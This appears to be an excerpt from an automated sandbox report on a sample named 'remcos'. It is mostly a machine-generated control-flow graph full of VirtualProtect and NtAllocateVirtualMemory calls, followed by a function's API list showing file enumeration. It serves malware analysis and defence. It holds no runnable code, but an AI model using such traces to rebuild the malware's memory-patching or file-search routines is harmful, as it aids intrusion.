33055 334e0cd 33054->33055 33056 334e0f6 33055->33056 33058 334e203 33055->33058 33057 334e117 33056->33057 33060 3347be8 VirtualProtect 33057->33060 33059 3347be8 VirtualProtect 33058->33059 33061 334e27f 33059->33061 33062 334e172 33060->33062 33063 334e2a0 33061->33063 33064 334e193 33062->33064 33066 334e2ab 33063->33066 33065 334e19e 33064->33065 33068 3347be8 VirtualProtect 33065->33068 33067 3347be8 VirtualProtect 33066->33067 33069 334e1ee 33067->33069 33068->33069 33070 334e1fe 33069->33070 33071 334e32b 33070->33071 33072 3347be8 VirtualProtect 33071->33072 33073 334e386 33072->33073 33074 334e3a7 33073->33074 33075 3347be8 VirtualProtect 33074->33075 33076 334e402 33075->33076 33077 334e40f 33076->33077 33078 334e439 33077->33078 33079 334e452 33078->33079 33080 334e4c2 33079->33080 33081 3347be8 VirtualProtect 33080->33081 33082 334e4ce 33081->33082 33083 334e53e 33082->33083 33084 3347be8 VirtualProtect 33083->33084 33085 334e54a 33084->33085 33086 334e5ba 33085->33086 33087 3347be8 VirtualProtect 33086->33087 33088 334e5c6 33087->33088 33089 334e5ff 33088->33089 33090 334e636 33089->33090 33091 3347be8 VirtualProtect 33090->33091 33092 334e642 33091->33092 33093 334e672 33092->33093 33094 334e67d 33093->33094 33095 334e6b4 33094->33095 33096 334e6c1 33095->33096 33097 3347be8 VirtualProtect 33096->33097 33098 334e6cd 33097->33098 33099 334e6ee 33098->33099 33100 334e6f9 33099->33100 33101 334e730 33100->33101 33102 334e73d 33101->33102 33103 3347be8 VirtualProtect 33102->33103 33104 334e749 33103->33104 33105 334e76a 33104->33105 33106 334e775 33105->33106 33107 334e782 33106->33107 33108 334e7ac 33107->33108 33109 3347be8 VirtualProtect 33108->33109 33110 334e7c5 33109->33110 33111 334e7cf 33110->33111 33112 334e7e7 33111->33112 33113 334e7ef 33112->33113 33114 334efab 33112->33114 33115 334e810 33113->33115 33116 334efd7 33114->33116 33117 334e828 33115->33117 33118 334f003 33116->33118 33120 334e852 33117->33120 33119 334f00e 33118->33119 33121 
3347be8 VirtualProtect 33119->33121 33122 3347be8 VirtualProtect 33120->33122 33124 334f027 33121->33124 33123 334e86b 33122->33123 33126 334e88c 33123->33126 33125 334f053 33124->33125 33128 334f07f 33125->33128 33127 334e8a4 33126->33127 33130 334e8ce 33127->33130 33129 334f08a 33128->33129 33131 3347be8 VirtualProtect 33129->33131 33132 3347be8 VirtualProtect 33130->33132 33133 334f0a3 33131->33133 33134 334e8e7 33132->33134 33135 334f0c4 33133->33135 33136 334e908 33134->33136 33137 334f0dc 33135->33137 33138 334e920 33136->33138 33139 334f0fb 33137->33139 33140 334e94a 33138->33140 33141 334f113 33139->33141 33142 334e957 33140->33142 33143 3347be8 VirtualProtect 33141->33143 33144 3347be8 VirtualProtect 33142->33144 33145 334f11f 33143->33145 33146 334e963 33144->33146 33147 334f130 33145->33147 33148 334e974 33146->33148 33150 334f141 33147->33150 33149 334e995 33148->33149 33151 334e9b6 33149->33151 33152 334f172 33150->33152 33153 334e9c1 33151->33153 33154 334f18a 33152->33154 33157 334e9ce 33153->33157 33155 334f1b4 33154->33155 33156 334f1c1 33155->33156 33158 3347be8 VirtualProtect 33156->33158 33159 3347be8 VirtualProtect 33157->33159 33160 334f1cd 33158->33160 33162 334ea11 33159->33162 33161 334f1ee 33160->33161 33163 334f206 33161->33163 33164 334ea3d 33162->33164 33165 334f23d 33163->33165 33166 334ea81 33164->33166 33167 3347be8 VirtualProtect 33165->33167 33168 3347be8 VirtualProtect 33166->33168 33169 334f249 33167->33169 33170 334ea8d 33168->33170 33172 334f26a 33169->33172 33171 334eab9 33170->33171 33174 334eac6 33171->33174 33173 334f282 33172->33173 33175 334f2a1 33173->33175 33176 334eaf0 33174->33176 33178 334f2b9 33175->33178 33177 334eafd 33176->33177 33180 3347be8 VirtualProtect 33177->33180 33179 3347be8 VirtualProtect 33178->33179 33181 334f2c5 33179->33181 33182 334eb09 33180->33182 33183 334f2da 33181->33183 33185 334eb31 33182->33185 33184 334f2ed 33183->33184 33186 334f30e 33184->33186 33187 334eb52 33185->33187 33189 334f319 
33186->33189 33188 334eb6a 33187->33188 33190 334eb89 33188->33190 33191 334f35d 33189->33191 33193 3347be8 VirtualProtect 33190->33193 33192 3347be8 VirtualProtect 33191->33192 33194 334f369 33192->33194 33195 334ebad 33193->33195 33197 334f38a 33194->33197 33196 334ebce 33195->33196 33199 334ebe6 33196->33199 33198 334f3cc 33197->33198 33200 334f3d9 33198->33200 33202 3347be8 VirtualProtect 33199->33202 33201 3347be8 VirtualProtect 33200->33201 33203 334f3e5 33201->33203 33204 334ec29 33202->33204 33205 334f406 33203->33205 33206 334ec38 33204->33206 33207 334f411 33205->33207 33209 334ec4a 33206->33209 33211 334efa6 33206->33211 33208 334f43d 33207->33208 33213 334f448 33208->33213 33210 334ec76 33209->33210 33212 334ec83 33210->33212 33217 33507dd 33211->33217 33218 334ecad 33212->33218 33214 3347be8 VirtualProtect 33213->33214 33215 334f461 33214->33215 33216 334f470 33215->33216 33219 334f47f 33216->33219 33220 3347be8 VirtualProtect 33217->33220 33221 3347be8 VirtualProtect 33218->33221 33224 334f4ab 33219->33224 33226 3350801 33220->33226 33222 334ecc6 33221->33222 33223 334ece7 33222->33223 33225 334ecf2 33223->33225 33227 334f4b8 33224->33227 33231 334ecff 33225->33231 33229 3350859 33226->33229 33228 334f4ef 33227->33228 33230 3347be8 VirtualProtect 33228->33230 33233 3347be8 VirtualProtect 33229->33233 33232 334f4fb 33230->33232 33234 3347be8 VirtualProtect 33231->33234 33237 334f527 33232->33237 33235 335087d 33233->33235 33236 334ed42 33234->33236 33238 33508b6 33235->33238 33240 334ed6e 33236->33240 33241 334f56b 33237->33241 33239 33508e0 33238->33239 33243 33508ed 33239->33243 33242 334edb2 33240->33242 33244 3347be8 VirtualProtect 33241->33244 33247 3347be8 VirtualProtect 33242->33247 33246 3347be8 VirtualProtect 33243->33246 33245 334f577 33244->33245 33245->33211 33251 334f589 33245->33251 33249 33508f9 33246->33249 33248 334edbe 33247->33248 33250 334edea 33248->33250 33254 3350925 33249->33254 33253 334edf7 33250->33253 33252 334f5b5 
33251->33252 33258 334f5e1 33252->33258 33255 334ee21 33253->33255 33256 335095c 33254->33256 33257 334ee2e 33255->33257 33259 3347be8 VirtualProtect 33256->33259 33260 3347be8 VirtualProtect 33257->33260 33263 3347be8 VirtualProtect 33258->33263 33261 3350975 33259->33261 33262 334ee3a 33260->33262 33264 335099a 33261->33264 33335 3358b94 33261->33335 33265 334ee66 33262->33265 33266 334f605 33263->33266 33271 33509bb 33264->33271 33267 334ee73 33265->33267 33270 334f631 33266->33270 33268 334ee9d 33267->33268 33269 334eeaa 33268->33269 33272 3347be8 VirtualProtect 33269->33272 33275 3347be8 VirtualProtect 33270->33275 33274 3347be8 VirtualProtect 33271->33274 33273 334eeb6 33272->33273 33277 334eecd 33273->33277 33276 3350a16 33274->33276 33278 334f681 33275->33278 33282 3350a37 33276->33282 33280 334eede 33277->33280 33279 334f69d 33278->33279 33281 334f6ce 33279->33281 33286 334ef4b 33280->33286 33283 334f6d9 33281->33283 33284 3350a6e 33282->33284 33288 334f705 33283->33288 33285 3347be8 VirtualProtect 33284->33285 33289 3350a92 33285->33289 33287 334ef8d 33286->33287 33291 334ef9a 33287->33291 33290 334f71d 33288->33290 33296 3350acb 33289->33296 33292 3347be8 VirtualProtect 33290->33292 33293 3347be8 VirtualProtect 33291->33293 33294 334f729 33292->33294 33293->33211 33295 334f74a 33294->33295 33297 334f755 33295->33297 33298 3350b02 33296->33298 33300 334f781 33297->33300 33299 3347be8 VirtualProtect 33298->33299 33301 3350b0e 33299->33301 33302 334f799 33300->33302 33307 3350b3a 33301->33307 33303 3347be8 VirtualProtect 33302->33303 33304 334f7a5 33303->33304 33305 334f7c6 33304->33305 33306 334f7d1 33305->33306 33308 334f7fd 33306->33308 33309 3347be8 VirtualProtect 33307->33309 33311 334f808 33308->33311 33310 3350b8a 33309->33310 33317 3350ba6 33310->33317 33312 3347be8 VirtualProtect 33311->33312 33313 334f821 33312->33313 33314 334f842 33313->33314 33315 334f85a 33314->33315 33316 334f884 33315->33316 33318 334f891 33316->33318 33319 3350c26 
33317->33319 33321 3347be8 VirtualProtect 33318->33321 33320 3347be8 VirtualProtect 33319->33320 33326 3350c32 33320->33326 33322 334f89d 33321->33322 33323 334f8be 33322->33323 33324 334f8d6 33323->33324 33325 334f900 33324->33325 33327 334f90d 33325->33327 33328 3350ca2 33326->33328 33329 3347be8 VirtualProtect 33327->33329 33330 3347be8 VirtualProtect 33328->33330 33331 334f919 33329->33331 33334 3350cae 33330->33334 33332 334f92e 33331->33332 33333 334f965 33332->33333 33337 334f99c 33333->33337 33339 3350d26 33334->33339 34041 333e3b0 VariantClear 33335->34041 33338 334f9b4 33337->33338 33341 3347be8 VirtualProtect 33338->33341 33340 3347be8 VirtualProtect 33339->33340 33345 3350d4a 33340->33345 33342 334f9c0 33341->33342 33343 334f9e1 33342->33343 33344 334f9ec 33343->33344 33347 334fa18 33344->33347 33346 3350da2 33345->33346 33348 3350dad 33346->33348 33349 334fa30 33347->33349 33350 3350dba 33348->33350 33351 3347be8 VirtualProtect 33349->33351 33352 3347be8 VirtualProtect 33350->33352 33353 334fa3c 33351->33353 33354 3350dc6 33352->33354 33356 334fa5d 33353->33356 33355 3350de7 33354->33355 33357 3350df2 33355->33357 33360 334fa68 33356->33360 33358 3350dff 33357->33358 33359 3350e1e 33358->33359 33361 3350e29 33359->33361 33362 334faac 33360->33362 33363 3350e36 33361->33363 33364 3347be8 VirtualProtect 33362->33364 33365 3347be8 VirtualProtect 33363->33365 33366 334fab8 33364->33366 33367 3350e42 33365->33367 33371 334fae3 33366->33371 33368 3350e53 33367->33368 33369 3350e69 33368->33369 33370 3350e7c 33369->33370 33372 3350e9d 33370->33372 33374 334fb1a 33371->33374 33378 3350ea8 33372->33378 33373 3358e6b 33373->32950 33375 334fb25 33374->33375 33376 3347be8 VirtualProtect 33375->33376 33377 334fb3e 33376->33377 33379 334fb6a 33377->33379 33380 3347be8 VirtualProtect 33378->33380 33381 334fb77 33379->33381 33382 3350ef8 33380->33382 33383 334fb96 33381->33383 33386 3350f24 33382->33386 33384 3347be8 VirtualProtect 33383->33384 33385 334fbba 
33384->33385 33387 334fbf4 33385->33387 33388 3347be8 VirtualProtect 33386->33388 33389 334fbff 33387->33389 33390 3350f74 33388->33390 33391 334fc0c 33389->33391 33395 3350f92 33390->33395 33392 334fc43 33391->33392 33393 3347be8 VirtualProtect 33392->33393 33394 334fc70 33392->33394 33393->33392 33396 334fc7b 33394->33396 33397 3350ffb 33395->33397 33398 334fcbf 33396->33398 33401 335103a 33397->33401 33399 3347be8 VirtualProtect 33398->33399 33991 334c8ac 33398->33991 33399->33398 33405 3351071 33401->33405 33402 334fcdd 33403 334fcfe 33402->33403 33404 334fd09 33403->33404 33407 334fd16 33404->33407 33406 3347be8 VirtualProtect 33405->33406 33408 3351095 33406->33408 33409 334fd4d 33407->33409 33412 33510ce 33408->33412 33410 3347be8 VirtualProtect 33409->33410 33411 334fd7a 33409->33411 33410->33409 33603 334fd85 33411->33603 33413 3351105 33412->33413 33414 3347be8 VirtualProtect 33413->33414 33415 3351111 33414->33415 33417 3351128 33415->33417 33416 334fdc9 33418 3347be8 VirtualProtect 33416->33418 33606 334fcd5 33416->33606 33419 335113b 33417->33419 33458 3351319 33417->33458 33418->33416 33422 3351174 33419->33422 33420 334fdec 33421 334fe25 33420->33421 33429 334fe4f 33421->33429 33424 3347be8 VirtualProtect 33422->33424 33423 3351350 33425 3347be8 VirtualProtect 33423->33425 33428 33511b7 33424->33428 33426 33513a0 33425->33426 33432 33513cc 33426->33432 33427 3347be8 VirtualProtect 33427->33429 33430 33511f0 33428->33430 33429->33427 33435 334fea1 33429->33435 33431 3351227 33430->33431 33433 3347be8 VirtualProtect 33431->33433 33434 3347be8 VirtualProtect 33432->33434 33436 3351233 33433->33436 33437 335141c 33434->33437 33438 3347be8 VirtualProtect 33435->33438 33439 334feeb 33435->33439 33440 3351262 33436->33440 33446 335144f 33437->33446 33438->33435 33441 334ff17 33439->33441 33442 3347be8 VirtualProtect 33440->33442 33443 334ff43 33441->33443 33444 3351286 33442->33444 33445 334ff4e 33443->33445 33449 33512bf 33444->33449 33448 3347be8 
VirtualProtect 33445->33448 33447 3347be8 VirtualProtect 33446->33447 33450 33514cb 33447->33450 33451 334ff67 33448->33451 33452 33512f6 33449->33452 33457 3351504 33450->33457 33453 334ff93 33451->33453 33454 3347be8 VirtualProtect 33452->33454 33456 334ffbf 33453->33456 33455 3351302 33454->33455 33455->33458 33459 334ffca 33456->33459 33460 335153b 33457->33460 33458->33423 33462 3347be8 VirtualProtect 33459->33462 33461 3347be8 VirtualProtect 33460->33461 33465 3351547 33461->33465 33463 334ffe3 33462->33463 33999 3346d84 33463->33999 34038 3342854 VariantClear 33463->34038 33468 3351573 33465->33468 33467 3350003 33469 335002f 33467->33469 33470 33515aa 33468->33470 33471 335003c 33469->33471 33472 3347be8 VirtualProtect 33470->33472 33474 3350066 33471->33474 33473 33515c3 33472->33473 33476 33515e4 33473->33476 33477 3350073 33474->33477 33475 3347be8 VirtualProtect 33475->33477 33480 335161b 33476->33480 33477->33475 33478 33500a0 33477->33478 33479 33500ab 33478->33479 33482 33500d7 33479->33482 33481 3347be8 VirtualProtect 33480->33481 33489 335163f 33481->33489 33483 33500ef 33482->33483 33485 3347be8 VirtualProtect 33483->33485 33484 3353345 33491 3353371 33484->33491 33488 33500fb 33485->33488 33486 3351654 33486->33489 33490 335013c 33488->33490 34004 333e3b8 33488->34004 33489->33484 33489->33486 33492 33516bd 33489->33492 33493 3350154 33490->33493 33494 33533a8 33491->33494 33498 33516de 33492->33498 33495 335017e 33493->33495 33496 3347be8 VirtualProtect 33494->33496 33500 335018b 33495->33500 33497 33533c1 33496->33497 33501 33533e2 33497->33501 33502 3351715 33498->33502 33499 3347be8 VirtualProtect 33499->33500 33500->33499 33503 33501b8 33500->33503 33505 3353419 33501->33505 33504 3347be8 VirtualProtect 33502->33504 33507 33501d0 33503->33507 33506 3351739 33504->33506 33508 3347be8 VirtualProtect 33505->33508 33511 3351772 33506->33511 33512 3350207 33507->33512 33509 335343d 33508->33509 33516 3353476 33509->33516 33510 3347be8 
VirtualProtect 33510->33512 33514 33517a9 33511->33514 33512->33510 33513 333e3b8 2 API calls 33512->33513 33517 3350224 33513->33517 33515 3347be8 VirtualProtect 33514->33515 33520 33517b5 33515->33520 33519 33534ad 33516->33519 33518 3350253 33517->33518 33521 3350260 33518->33521 33522 3347be8 VirtualProtect 33519->33522 33524 33517e1 33520->33524 33525 335028a 33521->33525 33523 33534b9 33522->33523 33528 33534e5 33523->33528 33526 3351818 33524->33526 33527 3347be8 VirtualProtect 33525->33527 33531 3347be8 VirtualProtect 33526->33531 33529 33502a3 33527->33529 33535 335351c 33528->33535 33530 33502c4 33529->33530 33533 33502cf 33530->33533 33532 3351831 33531->33532 33534 3351841 33532->33534 33538 33502dc 33533->33538 33534->33484 33545 3351854 33534->33545 33536 3347be8 VirtualProtect 33535->33536 33537 3353535 33536->33537 33539 3353556 33537->33539 33540 3347be8 VirtualProtect 33538->33540 33544 335358d 33539->33544 33541 335031f 33540->33541 33542 333e3b8 2 API calls 33541->33542 34015 33417a4 33541->34015 33542->33541 33547 3347be8 VirtualProtect 33544->33547 33546 3347be8 VirtualProtect 33545->33546 33555 33518d0 33546->33555 33554 33535b1 33547->33554 33548 3350348 33549 33503a0 33548->33549 33550 33503ab 33549->33550 33551 3347be8 VirtualProtect 33550->33551 33552 33503c4 33551->33552 33553 33503e5 33552->33553 33557 33503fd 33553->33557 33558 335363a 33554->33558 33556 3347be8 VirtualProtect 33555->33556 33568 335194c 33556->33568 33560 335041c 33557->33560 33559 3347be8 VirtualProtect 33558->33559 33562 3353653 33559->33562 33561 3347be8 VirtualProtect 33560->33561 33563 3350440 33561->33563 33566 33536b6 33562->33566 33564 3350445 33563->33564 33565 3350471 33564->33565 33569 335047e 33565->33569 33567 3347be8 VirtualProtect 33566->33567 33572 33536cf 33567->33572 33570 3347be8 VirtualProtect 33568->33570 33571 33504b5 33569->33571 33575 3351a33 33570->33575 33573 3347be8 VirtualProtect 33571->33573 33577 3353727 33572->33577 33574 33504c1 
33573->33574 33576 33504ed 33574->33576 33575->32950 33578 3350531 33576->33578 33579 3347be8 VirtualProtect 33577->33579 33580 3347be8 VirtualProtect 33578->33580 33583 3353777 33579->33583 33580->33606 33581 3350562 33582 33505ba 33581->33582 33585 33505c5 33582->33585 33584 3347be8 VirtualProtect 33583->33584 33590 33537f3 33584->33590 33586 3347be8 VirtualProtect 33585->33586 33587 33505de 33586->33587 33588 33505ff 33587->33588 33589 3350617 33588->33589 33592 3350636 33589->33592 33591 3347be8 VirtualProtect 33590->33591 33597 335386f 33591->33597 33593 3347be8 VirtualProtect 33592->33593 33594 335065a 33593->33594 33595 335066a 33594->33595 33596 335069b 33595->33596 33599 33506a6 33596->33599 33598 3347be8 VirtualProtect 33597->33598 33604 33538eb 33598->33604 33600 33506dd 33599->33600 33601 33506ea 33600->33601 33602 3347be8 VirtualProtect 33601->33602 33601->33603 33602->33601 33603->33416 33605 3347be8 VirtualProtect 33604->33605 33608 3353998 33605->33608 33606->33211 33606->33366 33606->33402 33606->33420 33606->33581 33607 3347be8 VirtualProtect 33606->33607 33607->33606 33609 3347be8 VirtualProtect 33608->33609 33610 3353a14 33609->33610 33611 3347be8 VirtualProtect 33610->33611 33612 3353a90 33611->33612 33613 3353abc 33612->33613 33614 3347be8 VirtualProtect 33613->33614 33615 3353b0c 33614->33615 33616 3347be8 VirtualProtect 33615->33616 33617 3353b88 33616->33617 33618 3347be8 VirtualProtect 33617->33618 33619 3353c04 33618->33619 33620 33553e0 33619->33620 33622 3353c64 33619->33622 33621 3347be8 VirtualProtect 33620->33621 33624 335545c 33621->33624 33623 3347be8 VirtualProtect 33622->33623 33626 3353ce0 33623->33626 33625 3347be8 VirtualProtect 33624->33625 33628 33554d8 33625->33628 33627 3347be8 VirtualProtect 33626->33627 33630 3353d5c 33627->33630 33629 3347be8 VirtualProtect 33628->33629 33632 3355554 33629->33632 33631 3347be8 VirtualProtect 33630->33631 33636 3353dd8 33631->33636 33633 3347be8 VirtualProtect 33632->33633 33634 33555d0 
33633->33634 33635 3347be8 VirtualProtect 33634->33635 33637 335564c 33635->33637 33638 3347be8 VirtualProtect 33636->33638 33641 3356190 33637->33641 33642 3355661 33637->33642 33639 3353e8c 33638->33639 33640 3347be8 VirtualProtect 33639->33640 33645 3353f08 33640->33645 33643 3347be8 VirtualProtect 33641->33643 33644 3347be8 VirtualProtect 33642->33644 33647 335620c 33643->33647 33648 33556dd 33644->33648 33646 3347be8 VirtualProtect 33645->33646 33651 3353f84 33646->33651 33649 3347be8 VirtualProtect 33647->33649 33650 3347be8 VirtualProtect 33648->33650 33653 3356288 33649->33653 33654 3355759 33650->33654 33652 3347be8 VirtualProtect 33651->33652 33660 3354000 33652->33660 33656 3347be8 VirtualProtect 33653->33656 33655 3347be8 VirtualProtect 33654->33655 33662 33557d5 33655->33662 33657 3356304 33656->33657 33658 3347be8 VirtualProtect 33657->33658 33659 3356380 33658->33659 33664 3356395 33659->33664 33665 3356b47 33659->33665 33661 3347be8 VirtualProtect 33660->33661 33667 33540cd 33661->33667 33663 3347be8 VirtualProtect 33662->33663 33670 335587a 33663->33670 33668 3347be8 VirtualProtect 33664->33668 33666 3347be8 VirtualProtect 33665->33666 33673 3356bd0 33666->33673 33669 3347be8 VirtualProtect 33667->33669 33672 3356411 33668->33672 33674 3354149 33669->33674 33671 3347be8 VirtualProtect 33670->33671 33678 33558f6 33671->33678 33675 3347be8 VirtualProtect 33672->33675 33676 3347be8 VirtualProtect 33673->33676 33677 3347be8 VirtualProtect 33674->33677 33680 335648d 33675->33680 33681 3356c4c 33676->33681 33682 33541c5 33677->33682 33679 3347be8 VirtualProtect 33678->33679 33687 3355972 33679->33687 33683 3347be8 VirtualProtect 33680->33683 33684 3347be8 VirtualProtect 33681->33684 33685 3347be8 VirtualProtect 33682->33685 33686 3356509 33683->33686 33695 3356cc8 33684->33695 33691 3354241 33685->33691 33689 335656c 33686->33689 33688 3347be8 VirtualProtect 33687->33688 33697 3355a15 33688->33697 33690 3347be8 VirtualProtect 33689->33690 33699 3356585 
33690->33699 33692 3347be8 VirtualProtect 33691->33692 33701 33542bd 33692->33701 33693 33574a8 33694 3347be8 VirtualProtect 33693->33694 33703 3357524 33694->33703 33695->33693 33696 3347be8 VirtualProtect 33695->33696 33705 3356d6e 33696->33705 33698 3347be8 VirtualProtect 33697->33698 33707 3355a91 33698->33707 33700 3347be8 VirtualProtect 33699->33700 33709 3356601 33700->33709 33702 3347be8 VirtualProtect 33701->33702 33714 3354339 33702->33714 33704 3347be8 VirtualProtect 33703->33704 33711 33575a0 33704->33711 33706 3347be8 VirtualProtect 33705->33706 33713 3356dea 33706->33713 33708 3347be8 VirtualProtect 33707->33708 33718 3355b0d 33708->33718 33710 3347be8 VirtualProtect 33709->33710 33723 335667d 33710->33723 33712 3347be8 VirtualProtect 33711->33712 33717 335761c 33712->33717 33715 3347be8 VirtualProtect 33713->33715 33716 3347be8 VirtualProtect 33714->33716 33732 3356e66 33715->33732 33726 33543ee 33716->33726 33719 3347be8 VirtualProtect 33717->33719 33720 3347be8 VirtualProtect 33718->33720 33721 335764f 33719->33721 33729 3355ba8 33720->33729 33722 3347be8 VirtualProtect 33721->33722 33725 3357682 33722->33725 33724 3347be8 VirtualProtect 33723->33724 33735 3356716 33724->33735 33727 3347be8 VirtualProtect 33725->33727 33728 3347be8 VirtualProtect 33726->33728 33730 33576b5 33727->33730 33737 335446a 33728->33737 33731 3347be8 VirtualProtect 33729->33731 33733 3347be8 VirtualProtect 33730->33733 33739 3355c24 33731->33739 33734 3347be8 VirtualProtect 33732->33734 33741 33576e8 33733->33741 33743 3356f3d 33734->33743 33736 3347be8 VirtualProtect 33735->33736 33745 3356792 33736->33745 33738 3347be8 VirtualProtect 33737->33738 33748 33544e6 33738->33748 33740 3347be8 VirtualProtect 33739->33740 33754 3355ca0 33740->33754 33742 3347be8 VirtualProtect 33741->33742 33751 3357764 33742->33751 33744 3347be8 VirtualProtect 33743->33744 33753 3356fb9 33744->33753 33746 3347be8 VirtualProtect 33745->33746 33747 335680e 33746->33747 34035 3347968 33747->34035 
33749 3347be8 VirtualProtect 33748->33749 33760 3354562 33749->33760 33752 3347be8 VirtualProtect 33751->33752 33764 33577e0 33752->33764 33755 3347be8 VirtualProtect 33753->33755 33818 335725c 33753->33818 33757 3347be8 VirtualProtect 33754->33757 33767 3357047 33755->33767 33756 3347be8 VirtualProtect 33766 335731e 33756->33766 33773 3355d5d 33757->33773 33758 3356828 33759 3347be8 VirtualProtect 33758->33759 33772 33568a9 33759->33772 33761 3354767 33760->33761 33763 3347be8 VirtualProtect 33760->33763 33762 3347be8 VirtualProtect 33761->33762 33777 3354851 33762->33777 33776 33545f3 33763->33776 33765 3347be8 VirtualProtect 33764->33765 33769 335785c 33765->33769 33768 3347be8 VirtualProtect 33766->33768 33770 3347be8 VirtualProtect 33767->33770 33784 335739a 33768->33784 33771 3347be8 VirtualProtect 33769->33771 33783 33570c3 33770->33783 33775 335788f 33771->33775 33774 3347be8 VirtualProtect 33772->33774 33778 3347be8 VirtualProtect 33773->33778 33789 3356925 33774->33789 33781 3347be8 VirtualProtect 33775->33781 33779 3347be8 VirtualProtect 33776->33779 33780 3347be8 VirtualProtect 33777->33780 33791 3355dfc 33778->33791 33793 335466f 33779->33793 33794 33548cd 33780->33794 33782 33578c2 33781->33782 33787 3347be8 VirtualProtect 33782->33787 33785 3347be8 VirtualProtect 33783->33785 33786 3347be8 VirtualProtect 33784->33786 33803 335713f 33785->33803 33800 3357416 33786->33800 33788 33578f5 33787->33788 33792 3347be8 VirtualProtect 33788->33792 33790 3347be8 VirtualProtect 33789->33790 33809 33569a1 33790->33809 33795 3347be8 VirtualProtect 33791->33795 33798 3357928 33792->33798 33796 3347be8 VirtualProtect 33793->33796 33797 3347be8 VirtualProtect 33794->33797 33806 3355e78 33795->33806 33807 33546eb 33796->33807 33808 3354949 33797->33808 33799 3347be8 VirtualProtect 33798->33799 33814 335795b 33799->33814 33801 3347be8 VirtualProtect 33800->33801 33802 3357492 33801->33802 34040 3347f48 NtAllocateVirtualMemory VirtualProtect 33802->34040 33805 3347be8 
VirtualProtect 33803->33805 33816 33571e0 33805->33816 33810 3347be8 VirtualProtect 33806->33810 33811 3347be8 VirtualProtect 33807->33811 33812 3347be8 VirtualProtect 33808->33812 33813 3347be8 VirtualProtect 33809->33813 33820 3355ef4 33810->33820 33811->33761 33819 33549c5 33812->33819 33824 3356a4f 33813->33824 33815 3347be8 VirtualProtect 33814->33815 33828 33579d7 33815->33828 33817 3347be8 VirtualProtect 33816->33817 33817->33818 33818->33756 33822 3347be8 VirtualProtect 33819->33822 33821 3347be8 VirtualProtect 33820->33821 33823 3355f70 33821->33823 33832 3354a41 33822->33832 34039 334a1c0 NtAllocateVirtualMemory VirtualProtect 33823->34039 33826 3347be8 VirtualProtect 33824->33826 33834 3356acb 33826->33834 33827 3355f81 33827->32950 33829 3347be8 VirtualProtect 33828->33829 33830 3357a53 33829->33830 33831 3347be8 VirtualProtect 33830->33831 33836 3357a86 33831->33836 33833 3347be8 VirtualProtect 33832->33833 33838 3354abd 33833->33838 33835 3347be8 VirtualProtect 33834->33835 33835->33665 33837 3347be8 VirtualProtect 33836->33837 33840 3357b02 33837->33840 33839 3347be8 VirtualProtect 33838->33839 33842 3354b39 33839->33842 33841 3347be8 VirtualProtect 33840->33841 33844 3357b7e 33841->33844 33843 3347be8 VirtualProtect 33842->33843 33851 3354bd4 33843->33851 33845 3347be8 VirtualProtect 33844->33845 33846 3357bfa 33845->33846 33847 3347be8 VirtualProtect 33846->33847 33848 3357c2d 33847->33848 33849 3347be8 VirtualProtect 33848->33849 33850 3357c60 33849->33850 33852 3347be8 VirtualProtect 33850->33852 33853 3347be8 VirtualProtect 33851->33853 33854 3357c93 33852->33854 33856 3354ccd 33853->33856 33855 3347be8 VirtualProtect 33854->33855 33858 3357cc6 33855->33858 33857 3347be8 VirtualProtect 33856->33857 33862 3354d49 33857->33862 33859 3347be8 VirtualProtect 33858->33859 33860 3357d42 33859->33860 33861 3347be8 VirtualProtect 33860->33861 33864 3357dbe 33861->33864 33863 3347be8 VirtualProtect 33862->33863 33868 3354e01 33863->33868 33865 3347be8 

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 9221 2de910f1-2de91166 call 2de92c40 * 2 lstrlenW call 2de92c40 lstrcatW lstrlenW 9228 2de91168-2de91172 lstrlenW 9221->9228 9229 2de91177-2de9119e lstrlenW FindFirstFileW 9221->9229 9228->9229 9230 2de911e1-2de911e9 9229->9230 9231 2de911a0-2de911a8 9229->9231 9232 2de911aa-2de911c4 call 2de91000 9231->9232 9233 2de911c7-2de911d8 FindNextFileW 9231->9233 9232->9233 9233->9231 9235 2de911da-2de911db FindClose 9233->9235 9235->9230
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 2DE91137
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 2DE91151
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9115C
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9116D
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2DE9117C
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 2DE91193
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 2DE911D0
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 2DE911DB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1083526818-0
                                                                                                                                                                                    • Opcode ID: b8cf97335b8be16919e40ab8951f4655eaf1919c5521bfdcd9ab47ff86feebbe
                                                                                                                                                                                    • Instruction ID: c80f7677ef3a144dca01ddde950f8720af28667260cf40e8c369f27613916358
                                                                                                                                                                                    • Opcode Fuzzy Hash: b8cf97335b8be16919e40ab8951f4655eaf1919c5521bfdcd9ab47ff86feebbe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B2191729053186BD720EA64DC48FDB7BECEF84714F00092ABA59E3190EB34E615C796
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
